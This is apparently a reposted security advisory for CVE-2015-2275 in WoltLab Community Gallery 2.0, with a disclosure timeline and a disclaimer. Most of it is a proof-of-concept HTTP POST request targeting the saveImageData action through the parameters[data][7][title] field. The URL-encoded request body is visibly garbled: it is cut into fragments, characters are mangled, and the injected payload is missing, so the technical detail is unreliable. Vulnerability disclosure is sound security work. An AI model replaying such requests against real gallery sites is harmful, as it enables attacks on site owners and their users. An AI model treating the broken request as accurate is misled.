vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST
/7788bdbc/gallery/index.php/
d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/
Content-Length: 1300
Cookie: wcf_cookieHash=
__cfduid=
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&
ctIDs%5B%5D=7¶meters%
D%5B7%5D%5BcategoryIDs%5D%5B%
5D=test¶meters%5Bdata%5D%
5D%5B7%5D%5Bfilename%5D=
D=47948¶meters%5Bdata%5D%
%5D%5BimageID%5D=7¶meters%
data%5D%5B7%5D%5Blongitude%5D=
=1¶meters%5Bdata%5D%5B7%
5B7%5D%5BthumbnailHeight%5D=0&
D=0¶meters%5Bdata%5D%5B7%
D%5BthumbnailY%5D=0&
mo.woltlab.com%2F7788bdbc%
parameters%5Bdata%5D%5B7%5D%
3E¶meters%5Bdata%5D%5B7%
bdbc%2Fgallery%2FuserImages%
D%5Bwidth%5D=640¶meters%
dit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the detail vulnerability to vendor
+ 03/11/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-
rning-board-community-gallery-
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
------------------------------
ITAS Team (www.itas.vn)
Komentarų nėra:
Rašyti komentarą